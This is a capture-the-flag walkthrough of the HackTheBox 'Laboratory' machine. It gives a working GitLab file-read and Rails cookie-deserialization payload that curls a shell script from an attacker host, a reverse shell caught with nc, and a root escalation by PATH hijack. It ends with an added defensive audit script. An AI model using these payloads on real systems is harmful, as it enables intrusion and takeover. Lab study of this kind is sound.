Let's start hacking the HackTheBox Laboratory machine!
I'm starting with an nmap scan.
Ports 80 and 443 are open, and the scan also gives us two DNS names, so let's add them to our /etc/hosts file.
I didn't find anything on https://laboratory.htb/, so I moved on to https://git.laboratory.htb/, where I got a GitLab sign-in page.
So I registered as a new user. Registration only allows email addresses on the laboratory.htb domain!
I signed in as the new user hacker and checked which version of GitLab they are using.
I googled whether there is any existing vulnerability in this version.
I found some exploits and a HackerOne report for this GitLab version.
So I read that report. It is an arbitrary file read vulnerability (https://hackerone.com/reports/827052).
There is a Python exploit script that reproduces this vulnerability: https://github.com/anjai94/gitlab-file-read-exploit
I edited the config part as we need.
The exploit gave me the secrets.yml file. In the HackerOne report above, the author also explains how to get a shell using this!
So I installed GitLab 12.8.1 on my Kali machine (https://packages.gitlab.com/app/gitlab/gitlab-ce/search?q=12.8.1&filter=all&dist=).
I installed GitLab using dpkg, then I changed the secret_key_base of our Kali machine (/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml) to the secret_key_base we got from the secrets.yml file on the site.
I replaced the keys and started the gitlab-rails console.
It takes a few minutes to start. Then I created a bash script to upload.
I started a Python simple HTTP server on my machine.
This payload can be generated by changing your own GitLab instance's secret_key_base
to match, then running the following in a Rails console:
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `curl http://10.0.0.1:8000/rev.sh -o /tmp/rev.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
After pasting this payload we have to trigger it, and for that we use another console:
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash /tmp/rev.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
This gives us a cookie that we can use to trigger a shell:
curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=" -k
Add that cookie to this command, and also start an nc listener to catch the reverse connection.
Now we can reset the user's password using the gitlab-rails console:
gitlab-rails console -e production
user = User.where(id: 1).first
user.password = 'password'
user.password_confirmation = 'password'
user.save!
Now we can log in to GitLab with the new password. After logging in we will get an SSH key!
We can use it to create an SSH login.
Here we get the user flag.
Privilege escalation
We can check for SUID permissions here:
find / -perm -u=s -type f 2>/dev/null
We can see that docker-security has been given the SUID permission.
We can get root access by exploiting the PATH variable here:
cd /tmp
echo "/bin/bash" > chmod
chmod 777 chmod
echo $PATH
export PATH=/tmp:$PATH
cd /usr/local/bin/
./docker-security
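The escalation above works because docker-security runs chmod by bare name and inherits a PATH that starts with a directory anyone can write to. The following audit script is an added example, not part of the writeup or the machine: path_audit flags PATH entries that make such a hijack possible, and bare_cmd_refs is a string-based heuristic (assumed, not exact) for spotting SUID binaries that reference a helper without an absolute path.

```shell
#!/bin/sh
# Added audit helper for the PATH-hijack step above (not from the writeup).
# It looks for the two conditions the escalation relied on:
#   1. a PATH entry an unprivileged user can write to (here /tmp), and
#   2. a SUID binary that runs a helper by bare name ("chmod") instead of an
#      absolute path, so the inherited PATH decides which program runs.

# path_audit [PATH]: print every risky entry of the colon-separated PATH
# (default: the caller's $PATH); return 1 if any were found, else 0.
# Risky = empty or relative (resolved against the caller's cwd), or a
# directory writable by "other" (e.g. /tmp, sticky bit or not).
path_audit() {
    rest="${1:-$PATH}:"   # trailing ':' so the loop also sees the last entry
    rc=0
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        if [ -z "$entry" ] || [ "${entry#/}" = "$entry" ]; then
            printf 'relative: "%s"\n' "$entry"
            rc=1
        # ls -L follows symlinks (/bin -> usr/bin on merged-usr systems);
        # column 9 of the mode string is the other-write bit.
        elif [ -d "$entry" ] && [ "$(ls -ldL "$entry" | cut -c9)" = "w" ]; then
            printf 'world-writable: %s\n' "$entry"
            rc=1
        fi
    done
    return $rc
}

# bare_cmd_refs FILE CMD: heuristic over a binary's printable strings.
# Returns 0 (suspicious) when CMD appears as a whole word but never as
# ".../CMD", i.e. the program most likely resolves it through PATH.
bare_cmd_refs() {
    grep -aqw -- "$2" "$1" && ! grep -aq -- "/$2" "$1"
}

# audit_suid [ROOT]: report SUID binaries under ROOT (default /) that
# appear to call common helpers by bare name.
audit_suid() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null | while read -r bin; do
        for cmd in chmod chown cp mv; do
            bare_cmd_refs "$bin" "$cmd" && printf '%s calls bare "%s"\n' "$bin" "$cmd"
        done
    done
}
```

On the target, `path_audit` run from a user shell shows whether /tmp or another writable directory precedes the system directories, and `audit_suid /usr/local/bin` narrows the SUID review to binaries worth reading with strings or a disassembler.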